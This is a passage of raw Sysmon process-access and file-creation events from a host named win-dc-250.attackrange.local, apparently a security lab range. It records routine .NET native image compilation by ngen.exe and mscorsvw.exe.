\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006318Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:04.134{08A6967A-457B-6000-3B02-000000009A01}3588C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e04-0\PresentationUI.dll2021-01-14 13:22:04.134 10341000x80000000000000006338Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:07.993{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-457F-6000-4102-000000009A01}3532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006337Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:07.978{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-457F-6000-4102-000000009A01}3532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006336Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:07.978{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-457F-6000-4102-000000009A01}3532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006335Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:07.931{08A6967A-457F-6000-4002-000000009A01}1852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\73c-0\SMDiagnostics.dll2021-01-14 13:22:07.931 10341000x80000000000000006334Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:07.821{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-457F-6000-4002-000000009A01}1852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006333Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:07.806{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-457F-6000-4002-000000009A01}1852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006332Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:07.806{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-457F-6000-4002-000000009A01}1852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006331Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:07.775{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-457F-6000-3F02-000000009A01}4704C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006330Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:07.759{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-457F-6000-3F02-000000009A01}4704C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006329Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:07.759{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-457F-6000-3F02-000000009A01}4704C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006328Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:07.712{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-457F-6000-3E02-000000009A01}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006327Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:07.712{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-457F-6000-3E02-000000009A01}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006326Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:07.712{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-457F-6000-3E02-000000009A01}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006325Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:07.556{08A6967A-457C-6000-3D02-000000009A01}1360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\550-0\ReachFramework.dll2021-01-14 13:22:07.556 10341000x80000000000000006347Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:08.353{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4580-6000-4402-000000009A01}4912C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006346Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:08.337{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4580-6000-4402-000000009A01}4912C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006345Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:08.337{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4580-6000-4402-000000009A01}4912C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006344Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:08.181{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4580-6000-4302-000000009A01}984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006343Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:08.165{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4580-6000-4302-000000009A01}984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006342Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:08.165{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4580-6000-4302-000000009A01}984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006341Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:08.071{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4580-6000-4202-000000009A01}5116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006340Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:08.056{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4580-6000-4202-000000009A01}5116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006339Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:08.056{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4580-6000-4202-000000009A01}5116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006354Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:12.775{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4584-6000-4602-000000009A01}4984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006353Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:12.775{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4584-6000-4602-000000009A01}4984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006352Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:12.775{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4584-6000-4602-000000009A01}4984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 